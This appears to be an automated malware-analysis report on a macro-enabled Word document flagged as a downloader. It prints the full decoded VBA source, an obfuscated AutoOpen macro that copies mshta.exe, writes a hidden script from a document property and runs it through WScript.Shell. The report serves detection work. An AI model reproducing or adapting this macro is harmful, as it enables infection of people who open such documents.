MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + asFOSt + "ell").run(adteU) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
aEcUJs = Environ(avRPGB) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8757 bytes |
SHA-256: 5e974c9838095dd4503914cc0a493a589681172a71846b8cd816bcbf5c484c00 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aMZs0U"
Sub AutoOpen()
a9AjDY
End Sub
Attribute VB_Name = "aHp7Az"
Public Const a2t7A As String = ""
Public Const aIC82y As Integer = 22230 / 1710
Public Const aVklcx As String = "1ridn1iw1"
Public Const a7iRb As String = "231met1sys1"
Public Const aXY6eU As String = "p1m1e1t"
Public Const asFOSt As String = "cript.sh"
Function aVcl3()
End Function
Sub aKfM0g(aPJc0)
' Yew for remained
' Summit tb
' Doors wizard continues
' Fruition deal
' Amendments fruit xxx cent lancashire
' Backwoods
' Musk throws blackmail printable -on municipality pe
' Ukraine aa faculty proficient mind mulberry
' Dishonesty vip requires
' Lombard papal square
' Mammon fissure
' Twenty-first java
' Prompter
' Vessels asus genealogical
' Clubs architect obsequies
' Terra-cotta academy lurch
' Baltimore bruce twinge chronic
' Asks spurn armstrong kijiji
' Margin moraine weaver enjoyed
' Septuagint retrograde epidermis
' Pin cheap
' Absorb mettle
' Financing find
' Musk unalterable substitution
' Heretic supernumerary msgstr unfavorable
End Sub
Function aMXBLS(atKB0J)
' Cir khaki
aMXBLS = ActiveDocument.BuiltInDocumentProperties(atKB0J)
End Function
Public Sub ayF85A()
aKc0Hd
End Sub
Public Sub a31Mm()
aUvRm
End Sub
Attribute VB_Name = "arSsT"
Public Function af1zOU(asuix, aropPN)
' Spa
' Ranger qualify collation
' Brawl absence brown plastics
' Nonsensical prosperously mince trade bounce
FileNumber = FreeFile
Open asuix For Output As #FileNumber
Print #FileNumber, aropPN
' Cranium occupational claim
Close #FileNumber
End Function
Sub aFVAi(a5vr4X, aEXZD)
' Bosnia antibody nutshell eye graph
' Importantly
' Broth enlarge beneficial ti
' Dates sept whenever
' Medallion depict
' Frames heights planner okay
' Fight variability abolitionists inauguration abbeys
' Young period
' Smoldering jennifer old-time tranny
' Illustration
' Chorus pontiff exasperate grocery
' Sustainable
' Thirty-three elimination
' Clipping fool plugins pages
' Elusive counted
' Dial
' Texas
' Resist rebuild cement generating density
' Sublimedirectory holdem confidant bulletin charwoman boxer
' Bosnia tragedian sql
' Delineate developers
' Pungent somehow
' Credibility stephanie adverted exceptionally
FileCopy a5vr4X, aEXZD
End Sub
Function aEnkW(abWRT)
' Closer
' Ignore
' Debut informal findings white
' Huge del
' Improving baying
' Adam
' Relapse muscles dentists ballot
' Terrorist lending toward
' Holocaust canteen jt varied
' Gauntlet prescription membership jazz bangkok
' Surveillance
aEnkW = abWRT
End Function
Function aQlJP(abWRT) As String
Dim axa83 As Long
Dim aJOgwD As Integer
Dim aGLTF As Integer
For axa83 = 1 To Len(abWRT)
' Shown phillip
' Sully did clap pedantic sic legitimate morocco
' Be-
' Hidden metal invited unsuitable
' Deformity lesson
' Sweden gps offhand espn
' Cause leaflet
' Stoicism
' Welch
' Mobility potential
' Satisfied statistics auntie condos
aGLTF = 0
' Bewitched josh impertinence quaking tobacco sue joel
aIx08R = Mid(abWRT, axa83, 1)
aJOgwD = Asc(aIx08R)
' Volunteer
' Acclamations perspicacity
' Kegs tackle airplane russet
' Quarrelsome vegas
' Imperceptibly arlington verify social metallic cruiser
' Cst botany anatomical transvaal
' Fry scanners
' Observed unacceptable panel lethargic
' Reich interpreted beginning
' Terrify arise continent misleading clicks lovable
' Bevis strengths ballet varnish asus
If (aJOgwD > anrNi2(17038 / 17038) And aJOgwD < anrNi2(30498 / 15249)) Or (aJOgwD > anrNi2(24096 / 8032) And aJOgwD < anrNi2(301 - 297)) Then
aGLTF = aIC82y
' Kingston stack iii fatherhood
' Acumen daddy
' Remedies hypnotic
' Sends literati electronics
' Candidates physicians hewlett slap
' Hard watts fella
' Adorable gray
' Forage
' Self-conscious intervene flaunt
' Reconstruct precipitated apparent hoary
aJOgwD = aTEyJ6(aJOgwD, aGLTF)
' Orb
If aJOgwD < anrNi2(5) And aJOgwD > 83 Then
aJOgwD = aAZOY3(aJOgwD)
ElseIf aJOgwD < -433 + 498 Then
aJOgwD = aAZOY3(aJOgwD)
End If
End If
avSjZ = aHokFV(aJOgwD)
' Claim
' Typewriter i
' Ties docile slime
' Guyana climber mausoleum gust
' Fuse acrimony
' Milky
' Maidenhead camera exhaust regimen
' Omnipresent chandler congregate catering
' Scholarship glad
' Pulp character hughes
' Focus holiday
Mid$(abWRT, axa83, 1) = aEnkW(avSjZ)
Next axa83
aQlJP = abWRT
End Function
Attribute VB_Name = "awsqcS"
Function aW3Bc8(aaeG2c)
' Bewitched mongolian persephone destroyed
aHbwP = aaeG2c
aNVGk = Len(aHbwP)
For acn8i = 0 To aNVGk - 1
aYZ7dX = aYZ7dX & Mid(aHbwP, (aNVGk - acn8i), 1)
Next acn8i
' Fewer certitude
aW3Bc8 = aYZ7dX
End Function
Public Function aZQ0s(ahEwy)
aZQ0s = Replace(ahEwy, a2t7A, "")
End Function
Sub a9AjDY()
' Godhead tricks hurl safeguard fails
' Astrology aunty
' Retrieve denver lint meet justify ranger
' Lurch expect dizziness
' Scoop subjugate living
' Guides chen sd
' Uploaded flag retrograde
' Twenty-seven jesse wrap
' Flexible charm city
' Df hardware northumberland
' Unavoidable handle solidity jj eating caucus
ayF85A
' Secured dollars wi
' Flux bridges registered
' Los melee nil loquacious
' Unconnected
' Wichita
' Tyrol negative abolishing
' Gill manually involve
' Statewide lucknow mete bosnia
' Berkshire devolve andromeda
' Dancer oz worry protein
' Valerian remonstrate
a31Mm
' Literally etruria condescend mazda
' Intact portsmouth schedule trash header
Call CreateObject("ws" + asFOSt + "ell").run(adteU)
End Sub
Attribute VB_Name = "aihus"
Function aEcUJs(avRPGB)
' Kiss meditate ethical sexual
aEcUJs = Environ(avRPGB)
End Function
Function a0lN7()
With Application
a0lN7 = .PathSeparator
End With
End Function
Function a6WwJq(awcQEm)
' Italy schema
' Counterpoise borough cologne vg
' Judgement saline
' Err
' Perishing rendered
' Unfeeling substantial qv match
' Cvs newly
' Cumulative
' Credulous italian coasting dawning
' Tho
' Aside awkwardly
aaxinT = VBA.Split(aW3Bc8("lmth.ni|moc.ni|exe.athsm"), "|")
' Chrysler co-operative
' Recast dauphin oracle treble
' Fifty-one frederick
' Ad ids dividend
' Standstill discipline finland
' Eighty-six tuner the
' Musician outreach pixel forsooth
' Mongolian eye-witness certification plumage evanescence
' Oscillation coldest bradford bolivia
' Carver servitor transmission
' Quantities
' Dimmer verona
Select Case awcQEm
' Pauses watchman uzbekistan fillet reflects
' Spawn fragrances prematurely vault
' Intelligent
' Shower
' Promptly narcissus scholarships practical
' Sew calculations
' Juno walks faggot
' Wn designate
' Warp
' Dave unencumbered
' Restaurant dress coasted
' All fatherland mystified
Case 0:
a6WwJq = aEcUJs(Replace(aW3Bc8(aVklcx), "1", "")) & a0lN7 & Replace(aW3Bc8(a7iRb), "1", "") & a0lN7 & aaxinT(0)
Case 1:
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & aaxinT(1)
Case 2:
' Discharging
' Candidate untitled
' Spinach fix provisionally beautiful fe
' Apostolic itch whiles aspirant engineer builders
' Clinic meme artificial
' Reversal converging
' Machinery lives
' Nicaragua unafraid
' Midsummer
' Misunderstand
' Mutter packages whiz
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & aaxinT(2)
End Select
End Function
Sub aUvRm()
aZObBH = aixC6O(a6WwJq(2))
af1zOU aZObBH, aQlJP(aMXBLS("category"))
End Sub
Attribute VB_Name = "a1n3Ns"
Function a4xYX(aQ42Od)
a4xYX = (aZQ0s(aQ42Od))
End Function
Function a01mq(avujU)
' Cockney washington cute
a01mq = (aZQ0s(avujU))
End Function
Function aixC6O(ajTif)
aixC6O = (aZQ0s(ajTif))
End Function
Function adteU()
aLkGNl = a01mq(a6WwJq(1))
a7n6T = aixC6O(a6WwJq(2))
adteU = aLkGNl & " " & a7n6T
End Function
Attribute VB_Name = "aTy64"
Sub aKc0Hd()
aiOuYv = a4xYX(a6WwJq(0))
asxbNQ = a01mq(a6WwJq(1))
aFVAi aiOuYv, asxbNQ
End Sub
Function aAZOY3(a7yzC)
aAZOY3 = a7yzC + 4628 / 178
End Function
Function anrNi2(aGrcvw)
If aGrcvw = 0 Then
anrNi2 = -23986 + 23987
ElseIf aGrcvw = 1 Then
anrNi2 = -41 + 105
ElseIf aGrcvw = 2 Then
anrNi2 = 16 + 75
ElseIf aGrcvw = 3 Then
anrNi2 = -153 + 249
ElseIf aGrcvw = 4 Then
anrNi2 = 327 - 204
ElseIf aGrcvw = 5 Then
anrNi2 = -211 + 308
Else
anrNi2 = 128 * 8
End If
End Function
Function aTEyJ6(a7yzC, ayXNgh)
aTEyJ6 = a7yzC - ayXNgh
End Function
Function aHokFV(a7yzC)
aHokFV = VBA.ChrW(a7yzC)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 42496 bytes |
SHA-256: 8b674d26bc86854fdc36437241d643559afc39cb54d4e89a88f4962207b0195a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.